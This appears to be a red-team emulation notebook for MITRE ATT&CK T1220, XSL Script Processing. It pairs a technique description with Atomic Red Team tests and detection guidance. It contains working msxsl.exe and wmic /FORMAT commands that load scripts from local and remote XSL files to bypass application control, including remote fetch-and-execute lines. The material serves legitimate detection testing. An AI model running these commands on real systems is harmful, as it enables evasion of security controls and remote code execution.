# T1220 - XSL Script Processing
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)

* <code>msxsl.exe customers[.]xml script[.]xsl</code>
* <code>msxsl.exe script[.]xsl script[.]xsl</code>
* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)

* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>

## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - MSXSL Bypass using local files
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: XML file must exist on disk at specified location (#{xmlfile})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1220\src\msxslxmlfile.xml) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1220\src\msxslxmlfile.xml) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "PathToAtomicsFolder\T1220\src\msxslxmlfile.xml"

```
##### Description: XSL file must exist on disk at specified location (#{xslfile})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1220\src\msxslscript.xsl) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1220\src\msxslscript.xsl) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "PathToAtomicsFolder\T1220\src\msxslscript.xsl"

```

In [ ]:
Invoke-AtomicTest T1220 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\Temp\msxsl.exe PathToAtomicsFolder\T1220\src\msxslxmlfile.xml PathToAtomicsFolder\T1220\src\msxslscript.xsl
```

In [ ]:
Invoke-AtomicTest T1220 -TestNumbers 1

### Atomic Test #2 - MSXSL Bypass using remote files
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
```

In [ ]:
Invoke-AtomicTest T1220 -TestNumbers 2

### Atomic Test #3 - WMIC bypass using local XSL file
Executes the code specified within a XSL script using a local payload.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: XSL file must exist on disk at specified location (#{local_xsl_file})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1220\src\wmicscript.xsl) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1220\src\wmicscript.xsl) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "PathToAtomicsFolder\T1220\src\wmicscript.xsl"

```

In [ ]:
Invoke-AtomicTest T1220 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic process list /FORMAT:"PathToAtomicsFolder\T1220\src\wmicscript.xsl"
```

In [ ]:
Invoke-AtomicTest T1220 -TestNumbers 3

### Atomic Test #4 - WMIC bypass using remote XSL file
Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
```

In [ ]:
Invoke-AtomicTest T1220 -TestNumbers 4

## Detection
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.

The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.

## Shield Active Defense
### Behavioral Analytics 
 Deploy tools that detect unusual system or user behavior. 

 Instrument a system to collect detailed information about process execution and user activity, develop a sense of normal or expected behaviors, and alert on abnormal or unexpected activity.  This can be accomplished either onboard the target system or by shipping data to a centralized analysis and alerting system.
#### Opportunity
There is an opportunity to detect the presence of an adversary by identifying and alerting on anomalous behaviors.
#### Use Case
The defender can use behavioral analytics detect an XSL process doing something abnormal.
#### Procedures
Use behavioral analytics to detect Living Off The Land Binaries (LOLBins) being used to download and execute a file.
Use behavioral analytics to identify a system running development tools, but is not used by someone who does development.
Use behavioral analytics to identify abnormal system processes being used to launch a different process.